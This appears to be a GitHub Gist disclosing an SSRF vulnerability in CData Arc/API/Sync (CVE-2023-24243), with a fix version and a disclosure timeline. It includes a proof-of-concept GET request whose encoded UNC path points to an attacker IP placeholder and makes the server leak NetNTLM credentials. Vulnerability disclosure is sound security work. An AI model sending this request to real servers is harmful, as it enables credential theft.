Skip to content

Instantly share code, notes, and snippets.

@d3vc0r3
Created June 15, 2023 15:12
Show Gist options
  • Save d3vc0r3/6460a5f006e32a2ebffe739e411ab1b8 to your computer and use it in GitHub Desktop.
Save d3vc0r3/6460a5f006e32a2ebffe739e411ab1b8 to your computer and use it in GitHub Desktop.
Server-Side Request Forgery (SSRF) vulnerablity in CData Arc/API/Sync <= v22.0.8336

Description

Send http request like this to remote cdata server (windows):

GET /%255c%255c[ATTACKER IP]%255cC$%255cbb HTTP/1.1
Host: cdata.arc.ip
 

Server will connect to attacker's ip and send netntlm credentials. We have requested a CVE entry (CVE-2023-24243).

request:

recieve:

Fix

Update to latest version (currently V22.0.8473). vendor information: https://www.cdata.com/kb/entries/netembeddedserver-notice.rst

Timeline

2022-10-03 vulnerability discovered during red team assessment 2023-03-09 vendor had informed 2023-03-14 vendor released fixed version 2023-06-13 vendor announcement

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment